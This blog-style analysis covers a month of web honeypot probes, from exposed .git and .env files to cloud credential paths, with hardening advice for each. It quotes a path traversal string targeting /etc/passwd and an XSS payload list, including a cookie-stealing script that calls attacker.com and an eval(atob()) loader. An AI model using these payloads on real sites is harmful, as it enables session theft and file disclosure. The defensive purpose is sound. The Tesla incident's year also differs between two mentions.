Analysis of Web Application Intrusion Attempts

I deployed a honeypot to observe real-world web application attack patterns in the wild. Over the course of a month, I collected 1,619 intrusion attempts targeting various endpoints. The results reveal what attackers are actively scanning for and provide valuable insights into common misconfigurations that threat actors exploit. This analysis breaks down the top threats discovered, explains the risks they pose, and provides practical hardening recommendations to protect your applications.


Prerequisites:

A basic understanding of web application architecture, cybersecurity, popcorn, and your favorite caffeinated beverage!

The Numbers

In total, my honeypot recorded 1,619 distinct intrusion attempts across various endpoints. The attack distribution revealed clear patterns in what threat actors prioritize when scanning for vulnerabilities. The top three categories alone accounted for over 17% of all attempts, with exposed Git repositories, environment files, and information disclosure endpoints dominating the landscape. Let's dive into what these attacks look like and why they matter.

1. Git Repository Exposure (7.23% of all attempts)

The single most targeted endpoint was /.git/config with 117 attempts, followed closely by /.git/HEAD with 12 attempts. When developers initialize a Git repository in their web application directory and deploy it to production without proper configuration, the entire .git folder becomes publicly accessible. This is a critical security vulnerability that many organizations overlook.

The .git/config file contains repository configuration including remote URLs, branch information, and potentially credentials if developers have hardcoded them. The .git/HEAD file reveals the current branch. But the real danger lies in what comes next. Once an attacker confirms the presence of a .git directory, they can use tools like GitDumper or git-dumper to recursively download the entire repository history, including all commits, branches, and deleted files.

What can happen if exploited: Attackers gain access to your entire source code, including historical commits that may contain accidentally committed secrets, API keys, database credentials, or proprietary algorithms. In 2018, Uber experienced a breach where attackers found AWS credentials in a private GitHub repository, leading to the exposure of 57 million user records. Even deleted commits remain in Git history and can reveal sensitive information that developers thought they had removed.

Hardening recommendations:

In your web server configuration, block access to any version control directories, or include a compensating control, like a WAF, to assist in preventing access. Better yet, never deploy your .git folder to production. Use a proper CI/CD pipeline that builds artifacts without version control metadata. If you're using Docker, ensure your .dockerignore file includes .git. For manual deployments, use git archive to create clean deployment packages:

git archive --format=tar HEAD | tar -x -C /path/to/deployment

2. Environment File Exposure (6.92% + variations)

Environment files dominated the attack landscape with /.env receiving 112 direct attempts. However, when you include variations like /api/.env (23 attempts), /backend/.env (18 attempts), /.env.bak (18 attempts), and dozens of other variations, environment file enumeration becomes the most significant attack category overall. Attackers understand that developers often create backup copies, use different env files for different environments, or place them in various subdirectories.

Environment files store application secrets in a centralized location, making them a high-value target. A typical .env file might contain:

# Database credentials DB_HOST=prod-db.company.internal DB_DATABASE=production_db DB_USERNAME=app_user DB_PASSWORD=P@ssw0rd123! # AWS credentials AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY AWS_DEFAULT_REGION=us-east-1 # API keys STRIPE_SECRET_KEY=sk_live_51H... SENDGRID_API_KEY=SG.abc123... TWILIO_AUTH_TOKEN=abc123... # JWT secrets JWT_SECRET=supersecretkey12345 SESSION_SECRET=anothersecretkey67890 # Application settings APP_DEBUG=true APP_URL=https://api.example.com

What can happen if exploited: In 2021, security researchers at Palo Alto Networks Unit 42 tracked a large-scale cloud extortion campaign that specifically targeted exposed .env files. They discovered over 110,000 domains with publicly accessible environment files containing more than 90,000 unique secrets. Attackers used these credentials to access cloud storage buckets, databases, and third-party services. The threat actors would exfiltrate sensitive data and then demand ransom payments to prevent public disclosure.

Once an attacker has your database credentials, they can dump your entire database including user credentials, personal information, and business data. AWS credentials can lead to complete cloud infrastructure takeover, including the ability to spin up expensive resources, access S3 buckets, or modify security groups. API keys for services like Stripe can result in financial theft, while email service credentials enable phishing campaigns sent from your legitimate domains.

Hardening recommendations:

First, ensure .env files are never committed to version control by adding them to your .gitignore. Configure your web server of choice to deny access to environment files. For production environments, consider using a secrets management solution like HashiCorp Vault, AWS Secrets Manager, or Azure Key Vault instead of flat files. These systems provide encryption at rest, access logging, automatic rotation, and fine-grained access controls. If you must use environment files, ensure they're stored outside your web root directory and loaded via your application configuration. Implement defense in depth by restricting file permissions on your production servers.

3. PHPInfo Exposure (1.73% + variations)

The /phpinfo.php endpoint received 28 attempts, with variations like /phpinfo (23 attempts), /_profiler/phpinfo (18 attempts), and /xampp/phpinfo.php (5 attempts) adding to the total. The phpinfo() function is incredibly useful during development as it displays comprehensive information about your PHP configuration, loaded modules, environment variables, and server details.

However, when left accessible in production, it becomes a reconnaissance goldmine for attackers. The output includes PHP version numbers, enabled extensions, file paths, environment variables (which may contain secrets), and detailed server configuration. This information helps attackers identify specific vulnerabilities, understand your application architecture, and plan targeted attacks.

What can happen if exploited: An exposed phpinfo page reveals your exact PHP version, allowing attackers to look up CVEs and known exploits that target that specific version. Disabled security functions like disable_functions tell attackers what attack vectors remain available. The page exposes your document root, file paths, and included configuration files, helping attackers understand your directory structure for path traversal attacks. Environment variables displayed in phpinfo often contain database credentials, API keys, and other secrets that developers incorrectly assume are "safe" because they're not in files.

In 2019, researchers discovered that many WordPress sites had phpinfo pages left accessible, which revealed database credentials in the environment variables section. Attackers could use this information to directly access databases without needing to exploit the application itself.

Hardening recommendations:

The simplest solution is to delete all phpinfo files from your production environment. Use a find command to locate them:

find /var/www -name "phpinfo.php" -type f find /var/www -name "*info.php" -type f

If you need to keep diagnostic capabilities for troubleshooting, implement authentication and IP restrictions. Better yet, create an administrative interface accessible only through VPN or bastion host rather than exposing diagnostic tools to the public internet.

4. IDE Configuration Files

VS Code SFTP configuration files (/.vscode/sftp.json) appeared 24 times in the logs. These configuration files, created by popular IDE extensions, often contain FTP/SFTP credentials for remote deployment. The contents typically look like this:

{ "name": "Production Server", "host": "ftp.example.com", "protocol": "sftp", "port": 22, "username": "deploy_user", "password": "PlainTextPassword123!", "remotePath": "/var/www/html", "uploadOnSave": true, "useTempFile": false }

Other IDE files like /.DS_Store (20 attempts) from macOS systems reveal directory structures and file metadata. While less severe than credential exposure, these files aid in reconnaissance by showing attackers your project structure, file names, and potentially sensitive directory names.

What can happen if exploited: Exposed SFTP credentials give attackers direct server access with the same privileges as your deployment user, often allowing them to modify application code, inject backdoors, or access other files on the server. The remotePath field tells them exactly where your application is deployed, and the username reveals what system account to target for privilege escalation attempts.

Hardening recommendations:

Add IDE-specific directories to your .gitignore. Block access via web server configuration files. Most importantly, never store credentials in IDE configuration files. Use SSH key-based authentication instead of passwords, and store keys outside your project directory. For VS Code SFTP extension, use SSH config files with key-based auth:

{ "name": "Production", "host": "example.com", "protocol": "sftp", "port": 22, "username": "deploy", "privateKeyPath": "~/.ssh/deploy_key", "remotePath": "/var/www/html" }

5. Cloud Provider Credentials

AWS credentials files (/.aws/credentials with 12 attempts and /.aws/config with 6 attempts) represent another high-value target. These files, typically stored in a user's home directory, contain AWS access keys that grant programmatic access to AWS services. Similar patterns appeared for Azure (/.azure/credentials, /.azure/accessTokens.json) and Google Cloud (/.config/gcloud/credentials.db, /.boto) credentials.

The AWS credentials file format is straightforward and deadly when exposed:

[default] aws_access_key_id = AKIAIOSFODNN7EXAMPLE aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY [production] aws_access_key_id = AKIAI44QH8DHBEXAMPLE aws_secret_access_key = je7MtGbClwBF/2Zp9Utk/h3yCo8nvbEXAMPLEKEY region = us-east-1

What can happen if exploited: Compromised cloud credentials can lead to catastrophic breaches. Attackers can access S3 buckets containing sensitive data, spin up expensive EC2 instances for cryptocurrency mining (resulting in massive bills), modify security groups to create persistent backdoors, access RDS databases, or use compromised accounts as a pivot point to attack other resources in your cloud environment.

In 2017, Tesla's Kubernetes console was left unsecured, allowing attackers to access AWS credentials stored in environment variables. The attackers used these credentials to run cryptomining operations on Tesla's infrastructure. In 2019, Capital One suffered a breach affecting 100 million customers when an attacker exploited a misconfigured WAF to access cloud credentials.

Hardening recommendations:

Never deploy AWS credential files to production servers or commit them to version control. Add them to .gitignore. For production workloads, use IAM roles and instance profiles instead of static credentials. If you must use static credentials, store them in AWS Secrets Manager or Systems Manager Parameter Store and retrieve them programmatically at runtime. Implement the principle of least privilege by creating IAM policies that grant only the specific permissions each application needs.

6. WordPress Configuration Backups

Ahhh WordPress. Typically a security nightmare... The presence of /wp-config.php.bak (6 attempts) and /.wp-config.php.swp (1 attempt) highlights a common mistake where backup files or editor swap files expose WordPress database credentials. While wp-config.php is processed by PHP and doesn't expose its source code, backup files with extensions like .bak, .old, .swp, or .save are served as plain text.

What can happen if exploited: WordPress configuration files contain database credentials, authentication salts, and security keys. Exposed database credentials allow attackers to dump your entire WordPress database including user credentials (which can be cracked), post content, and any sensitive data stored in custom fields. They can also inject new admin users, modify post content, or insert malicious code into the database that gets executed when pages load.

Hardening recommendations:

Configure your web server to deny access to backup files and editor swap files like bak|config|sql|fla|psd|ini|log|sh|inc|swp|dist|old. Regularly audit your web directory for backup files using the find command, or a web scanner you have. For WordPress specifically, move wp-config.php one directory above the web root if your hosting environment allows it. WordPress will automatically look for the configuration file in the parent directory, making it inaccessible via web requests.

7. Path Traversal Attempts

Several entries showed classic path traversal attempts like /%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd. URL encoding (%2F = /, %2E = .) is used to bypass basic filtering. These attacks attempt to break out of the web root and access system files like /etc/passwd, which contains user account information on Linux systems.

What can happen if exploited: Successful path traversal can expose sensitive system files including /etc/passwd (user accounts), /etc/shadow (password hashes if web server runs as root), application configuration files, database files, or even private SSH keys. Attackers use this information for privilege escalation, credential harvesting, or understanding system architecture for further attacks.

Hardening recommendations:

Never construct file paths directly from user input. Use a whitelist approach for file access:

// Bad $file = $_GET['file']; include("/var/www/files/" . $file); // Good $allowed_files = ['page1.php', 'page2.php', 'page3.php']; $file = $_GET['file']; if (in_array($file, $allowed_files)) { include("/var/www/files/" . $file); }

If you must accept file paths, validate and sanitize them rigorously:

// Use realpath() to resolve the actual path $file = basename($_GET['file']); // Remove path components $full_path = realpath('/var/www/files/' . $file); // Ensure the resolved path is within the intended directory if ($full_path && strpos($full_path, realpath('/var/www/files/')) === 0) { include($full_path); }

Configure your webserver of choice to prevent directory traversal in configuration settings where possible. Run your web application with minimal privileges using a dedicated user account that has no shell access and limited file system permissions. Use chroot jails or containers to limit what the application can access even if path traversal occurs.

8. The Long Tail: Sophisticated and Niche Attacks

While the common attacks grab headlines with their volume, the least frequent attempts in my honeypot data reveal a more sophisticated and targeted approach. These single-occurrence attacks (each representing 0.06% of total attempts) show attackers probing for specific cloud platforms, specialized development tools, and unique configuration files. Let's examine some of the most interesting uncommon attacks.

Kubernetes Configuration Exposure (/.kube/config): This file contains cluster authentication credentials, API server endpoints, and certificate data for Kubernetes clusters. The typical kubeconfig file looks like this:

apiVersion: v1 clusters: - cluster: certificate-authority-data: LS0tLS1CRUdJTi... server: https://kubernetes.example.com:6443 name: production-cluster contexts: - context: cluster: production-cluster user: admin-user name: production-context current-context: production-context kind: Config users: - name: admin-user user: client-certificate-data: LS0tLS1CRUdJTi... client-key-data: LS0tLS1CRUdJTi...

If exposed, this file grants an attacker complete control over your Kubernetes cluster. They can deploy malicious containers, access secrets stored in the cluster, exfiltrate data from pods, modify deployments, or use the cluster for cryptomining. The 2018 Tesla breach involved exposed Kubernetes credentials that allowed attackers to access the cluster and steal AWS credentials from pod environment variables.

Hardening: Never store kubeconfig files in web-accessible directories. Use Kubernetes service accounts with role-based access control (RBAC) for applications running in the cluster, and use short-lived tokens rather than static credentials. For external access, implement proper authentication through an identity provider with MFA enabled.

SSH Configuration Files (/.ssh/sftp-config.json): This attempt targets SFTP client configuration files that often contain SSH private keys or connection credentials. While properly configured SSH uses key-based authentication, many developers store configuration with references to private key locations or worse, embedded private keys directly in JSON configuration:

{ "type": "sftp", "host": "production.example.com", "user": "deploy", "port": 22, "remotePath": "/var/www/production", "privateKeyPath": "/home/user/.ssh/id_rsa", "passphrase": "KeyPassword123!" }

If an attacker finds the private key path and the key itself is also exposed (common when developers commit their entire .ssh directory), they gain direct SSH access to production servers. Even knowing the username and server address aids reconnaissance.

Hardening: Never store SSH private keys in web-accessible locations or commit them to repositories. Use SSH agent forwarding or bastion hosts for deployment access. Implement certificate-based SSH authentication with short-lived certificates instead of long-lived keys.

Multi-Cloud Credential Files: The honeypot detected attempts for Azure credentials (/.azure/credentials, /.azure/accessTokens.json), Google Cloud credentials (/.config/gcloud/application_default_credentials.json, /.config/gcloud/credentials.db), and legacy Google Cloud credentials (/.boto). The .boto file is particularly interesting as it's used by older Google Cloud Storage tools and the AWS S3 compatibility layer:

[Credentials] gs_access_key_id = GOOG1E... gs_secret_access_key = abc123... [Boto] https_validate_certificates = True [GSUtil] default_project_id = my-project-12345

The presence of these varied cloud credential attempts suggests attackers are running comprehensive cloud platform enumeration, recognizing that organizations increasingly use multi-cloud strategies. A single exposed credential file could provide access to storage buckets containing terabytes of sensitive data.

Hardening: For Google Cloud, use workload identity federation or service account impersonation instead of static keys. For Azure, use managed identities. Store all cloud credentials in platform-specific secret management services, not in files. Implement Cloud Asset Inventory and security command center monitoring to detect unusual access patterns.

Payment Provider Credentials (/.env.stripe, /.env.payment, /.stripe.bak, /sendgrid.env, /twilio.env): These highly specific attacks target environment files for payment processing and communication services. Finding a Stripe secret key provides the ability to process refunds, access customer payment information, or create charges. A typical secrets file might contain:

# .env.stripe STRIPE_PUBLISHABLE_KEY=pk_live_51H... STRIPE_SECRET_KEY=sk_live_51H... STRIPE_WEBHOOK_SECRET=whsec_... # SendGrid/Twilio for customer communications SENDGRID_API_KEY=SG.abc123... TWILIO_ACCOUNT_SID=AC... TWILIO_AUTH_TOKEN=...

Compromised Stripe keys enable attackers to access customer payment methods, process fraudulent refunds to their own accounts, or view complete transaction history including PII. SendGrid and Twilio credentials allow attackers to send phishing emails or SMS messages from your legitimate domains and phone numbers, making their attacks more credible to your customers.

Hardening: Use restricted API keys when possible (Stripe allows you to create keys with limited permissions). Implement webhook signature verification to prevent replay attacks. Store payment-related credentials in PCI-compliant secret storage with audit logging. Monitor API usage for anomalies like unusual refund patterns or geographic irregularities. Enable rate limiting and alerts through your payment provider's dashboard.

XSS Probe (/%3Cscript%3E%3C/script%3E): This URL-encoded XSS attempt (<script></script>) tests if your application reflects user input back in responses without proper sanitization. While this particular probe is benign, a successful reflection indicates the application might be vulnerable to Cross-Site Scripting attacks. Modern XSS exploits can be far more sophisticated:

# Simple reflected XSS <script>document.location='http://attacker.com/steal?cookie='+document.cookie</script> # DOM-based XSS <img src=x onerror="eval(atob('BASE64_ENCODED_PAYLOAD'))"> # Bypassing WAF filters <svg/onload=alert(1)> <iframe src="javascript:alert(1)">

Successful XSS allows attackers to steal session cookies, perform actions as the victim user, keylog credentials, or redirect users to phishing sites. In the context of administrative interfaces, XSS can lead to complete application compromise.

Hardening: Implement Content Security Policy (CSP) headers to restrict what scripts can execute:

# Strong CSP header Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'; frame-ancestors 'none';

Always encode output based on context (HTML entity encoding for HTML context, JavaScript encoding for JS context, URL encoding for URLs). Use modern frameworks with automatic XSS protection like React (which escapes by default) or template engines with auto-escaping. Implement HTTPOnly and Secure flags on all cookies to prevent JavaScript access and ensure transmission only over HTTPS.

Development Environment Files (/.env.travis, /.env.docker, /.env.dev.local): These attempts target CI/CD and development-specific environment files. Travis CI, Docker Compose, and local development environments often have separate configuration files that developers incorrectly assume are "safe" because they're not production credentials. However, these files frequently contain:

# .env.travis (CI/CD secrets) DEPLOY_KEY=ssh-rsa AAAAB3NzaC1yc2E... NPM_TOKEN=npm_abc123... DOCKER_USERNAME=company DOCKER_PASSWORD=P@ssw0rd # .env.docker (local dev that mirrors prod structure) DATABASE_URL=postgresql://user:pass@localhost:5432/dev_db API_KEY=same_key_as_production_because_developer_was_lazy

CI/CD credentials can allow attackers to inject malicious code into your build pipeline, leading to supply chain attacks where backdoors get deployed to production automatically. Development credentials often work in production because developers reuse them for convenience.

Hardening: Use different credentials for every environment without exception. Store CI/CD secrets in the platform's native secret management (GitHub Secrets, GitLab CI/CD variables, Travis encrypted variables). Never commit any .env variant to version control. Implement branch protection rules that require code review before merging changes to deployment configurations.

The Sophistication Signal: While each of these attacks appeared only once in my dataset, their presence indicates that attackers are running comprehensive enumeration scripts that check for hundreds or thousands of potential exposures. The specificity of files like /.github/stripe.env or /.env.payment suggests attackers have studied real-world codebases and identified patterns in how developers organize sensitive configurations.

These low-frequency attacks are particularly dangerous because organizations often focus security efforts on common threats while overlooking niche exposures. A single exposed Kubernetes config or payment provider key can be just as devastating as the more common .env file exposure, but receives less attention in security hardening efforts.

Defense in Depth Strategy

While I've provided specific hardening recommendations for each attack type, effective security requires a layered defense strategy. No single control is foolproof, so implementing multiple security layers ensures that if one fails, others remain in place.

Start with secure development practices including threat modeling, secure code review, and avoiding hardcoded secrets. Use a secrets management system like HashiCorp Vault, AWS Secrets Manager, or Azure Key Vault for all sensitive credentials. Implement proper input validation and output encoding throughout your application to prevent injection attacks.

At the web server level, configure restrictive file access rules, disable directory listing, and implement rate limiting to slow down automated scanning. Use a Web Application Firewall (WAF) to filter malicious requests before they reach your application. CloudFlare, AWS WAF, and ModSecurity provide solid options depending on your infrastructure.

For deployment security, never deploy development artifacts to production. Use CI/CD pipelines that build clean deployment packages without version control directories, IDE configurations, or development dependencies. Implement infrastructure as code to ensure consistent, reviewed configurations across all environments.

Enable comprehensive logging and monitoring to detect attacks in progress. Configure alerts for suspicious patterns like repeated 404 errors on sensitive endpoints, unusual file access attempts, or geographic anomalies in traffic patterns. Tools like Fail2Ban can automatically block IP addresses showing malicious behavior.

Regular security audits should include automated vulnerability scanning, manual penetration testing, and security code reviews. Use tools like OWASP ZAP, Burp Suite, or Nikto to scan for common vulnerabilities. Review your web server logs periodically to identify attack patterns you might have missed.

Lessons from the Honeypot

This honeypot exercise revealed that attackers use automated scanners to probe thousands of common misconfiguration patterns. The sheer variety of .env file variations (over 40 different paths) shows that attackers understand developer habits, backup naming conventions, and common directory structures.

The attacks weren't sophisticated but methodical, probing for low-hanging fruit that provides high-value access. This emphasizes that you don't need advanced exploits to compromise systems when basic security hygiene is neglected. Most of these vulnerabilities result from convenience during development that never gets hardened for production.

If your organization is serious about security, invest time in secure CI/CD pipelines, proper secrets management, and security testing as part of your deployment process. The attacks documented here are trivial to prevent with proper configuration, yet they remain prevalent because they succeed often enough to make automated scanning worthwhile for attackers.

Stay vigilant, keep your systems patched, and remember that security is not a one-time implementation but an ongoing process. Every new feature, every deployment, and every configuration change is an opportunity to either strengthen or weaken your security posture.

Links That I Found Useful: